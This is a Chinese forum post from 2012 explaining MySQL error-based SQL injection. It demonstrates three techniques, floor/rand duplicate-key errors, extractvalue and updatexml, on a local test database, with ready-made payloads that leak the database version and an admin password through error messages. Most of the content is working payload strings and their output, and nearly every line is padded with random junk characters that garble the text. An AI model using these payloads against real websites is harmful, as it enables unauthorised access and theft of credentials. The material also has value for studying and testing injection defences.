放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。
i5 n9 N7 d' r. C. s) |1 ?; m实际测试环境:
0 u; y& T ?+ j& d; p6 `+ h- X
, R; R& S- b4 g8 O% }
& N3 a9 b5 i: N, W" O7 _1 |/ amysql> show tables;
& C3 s4 Z U% T- v+----------------+* A/ }/ |# C$ o& X5 v K5 I" ?' O: y
| Tables_in_test |. h1 Z0 {( n2 v$ |$ y. _
+----------------+
6 K7 {5 i( B2 K; X; x| admin |$ C! c% Z% w2 a. U
| article |
% H3 v$ a1 \0 a" o- I0 r: Q+----------------+
6 I, S2 v& ~% R' c+ x
* w+ y6 z, d, ]5 E
3 V" R4 j g' b8 B. z; K. B9 j+ L
9 ^4 V/ }7 c3 m- f" Emysql> describe admin;; {5 L& b/ T) P
+-------+------------------+------+-----+---------+----------------+
& X. r; o, `5 z: r% m% u6 t| Field | Type | Null | Key | Default | Extra |% k* a' w' H/ {* x$ X! ~
+-------+------------------+------+-----+---------+----------------+* K& s% K/ U5 K
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
* e4 J8 A0 W5 {1 E* z| user | varchar(50) | NO | | NULL | |- l- s* k% v8 N
| pass | varchar(50) | NO | | NULL | |$ j3 u3 _% E/ N# w
+-------+------------------+------+-----+---------+----------------+7 V4 {- d' f( {, a8 @/ c8 W
0 v; X0 }* r, J8 Z
4 R$ G# o4 g& N' z" d C7 @" v
0 W; J4 M8 a9 @
mysql> describe article;
1 s g' s" Z. U& M0 u! |0 z: T+---------+------------------+------+-----+---------+----------------+
* s+ D0 T, l; J7 O0 z| Field | Type | Null | Key | Default | Extra |
' Q# e" e4 a( Q; p8 d' c' x+---------+------------------+------+-----+---------+----------------+
' m' a5 z$ G# S( [| id | int(10) unsigned | NO | PRI | NULL | auto_increment |+ p7 q; `5 Y6 b, D6 d
| title | varchar(50) | NO | | NULL | |
* ^! W/ F9 o! `1 f: ?* E$ }9 B| content | varchar(50) | NO | | NULL | |
# U4 |- a( r) h: k2 a9 t+---------+------------------+------+-----+---------+----------------+
' r6 D' o$ n6 B6 m1、通过floor报错
% |7 Z7 ?) i" E) h可以通过如下一些利用代码8 g" T0 y: ^: u' z/ r
6 p! n( @7 X0 y4 W- n
! Y8 \ M! a+ S1 \ f8 G- \and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x; X6 F6 J/ N' N8 T( O! M5 L8 `; O
from information_schema.tables group by x)a);
/ W9 H# F" x* n9 [6 U$ R Y 2 P$ F' A$ J8 ~8 [" J
( T/ K; M. ?$ H
and (select count(*) from (select 1 union select null union select !1)x
/ G" D* e# k6 jgroup by concat((select table_name from information_schema.tables limit 1),7 c }2 @' i- J. f1 n; u. h5 d
floor(rand(0)*2)));
/ T. r% H b0 @3 V' S* y举例如下:
! |, H" G9 m) o9 F4 J5 O首先进行正常查询:
9 ~+ I9 l+ N1 d8 O
7 B$ [3 `9 h( H, Wmysql> select * from article where id = 1;' ?! `* d! h; E5 j. ^+ N
+----+-------+---------+! D1 S* q6 T3 Y! a% s+ l: D
| id | title | content |; a1 V) j: H+ a: V5 z
+----+-------+---------+. V0 }8 _. ~# d- y
| 1 | test | do it |; I) u1 }6 m5 e, H; L
+----+-------+---------+
- X5 W3 E' ]' @! r6 T3 [假如id输入存在注入的话,可以通过如下语句进行报错。5 K* q) d+ X0 l! x) I+ f
# S/ J- L! m( [' T
3 d% S% M8 b. omysql> select * from article where id = 1 and (select 1 from
0 N" \# y. [0 U/ |( ?1 f' r/ ]: g(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);$ Q' M1 h+ Q, D% R7 g3 M: r3 H
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'
% c$ w- ~+ c, o1 Y& |可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。 Q; H& \9 J# s
例如我们需要查询管理员用户名和密码:
/ z1 x4 V+ H- A/ }. [& c; q' n# tMethod1:
9 e8 o" x$ v, d' s4 g0 ? 9 K) q. H* C7 h6 |
: H$ G7 m3 t* ?' L; e" K4 e
mysql> select * from article where id = 1 and (select 1 from
# |7 c& R6 ~) a7 p4 _. ](select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
0 {# F& |) [4 {# [+ I' N! c7 X2 H! Yfrom information_schema.tables group by x)a);
0 C5 R8 ]$ V( E$ d# I: DERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
6 g6 E: Z# D$ sMethod2:. k2 g c7 I3 z
. h$ ?9 ]4 e' ^+ I& j6 @2 O' k
- q4 f8 e6 {+ ~4 s$ ]0 F8 C7 L. Bmysql> select * from article where id = 1 and (select count(*)
) _; K) T2 C/ L% [from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
; C$ S+ [, B9 K6 d, h4 B/ gfloor(rand(0)*2)));7 q$ X+ o( o! c4 W( }! L7 f
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
3 E& r8 g0 V P$ O7 t" Q2、ExtractValue2 F% n& c% @6 R
测试语句如下
r) |: U3 H# a$ l( a. ^' Z$ X * R! F1 |# O, g
" Y! F3 m4 ~. U0 tand extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
( {) I$ e& p! |) s, _ Y9 \实际测试过程, ?- C& T& C) d* m+ W4 {% Z! [
* |; W2 K _3 r4 C! [
) s# X5 \& x6 y; Umysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,# _" ^; \9 G( \ {0 u- @! K1 D2 o! m
(select pass from admin limit 1)));--( l' O/ @1 ?2 j# g- D. _" v
ERROR 1105 (HY000): XPATH syntax error: '\admin888'8 i( ^, M* E4 }. H# W% b
3、UpdateXml
* L% d- |" G7 n2 ?$ m测试语句
7 n8 C* I/ A2 p5 i, |; p $ x1 j9 w, C, y! n. ~
( x$ M# C. l( u7 Hand 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))6 F d) f3 \- X* N, | B
实际测试过程+ x/ A' u6 d7 @0 X; [6 Y; ^; U
1 I' Y- t' u; x' v
3 l8 \. S2 _/ D8 p5 S7 B
mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
7 |4 F9 U( k8 x( a, |# f, u. m: `6 a, B% C(select pass from admin limit 1),0x5e24),1));" A6 f3 c$ i5 A, W- t3 k1 Z
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
7 U9 L, [0 K8 s6 u' u- OAll, thanks foreign guys.8 _$ S6 {/ U4 ?/ x4 q8 O6 ]& ?
7 p( ?1 |0 r) \+ a p0 _. n
# J5 {# E: Q9 K |
发表于 2012-12-10 10:28:51
收藏
支持
反对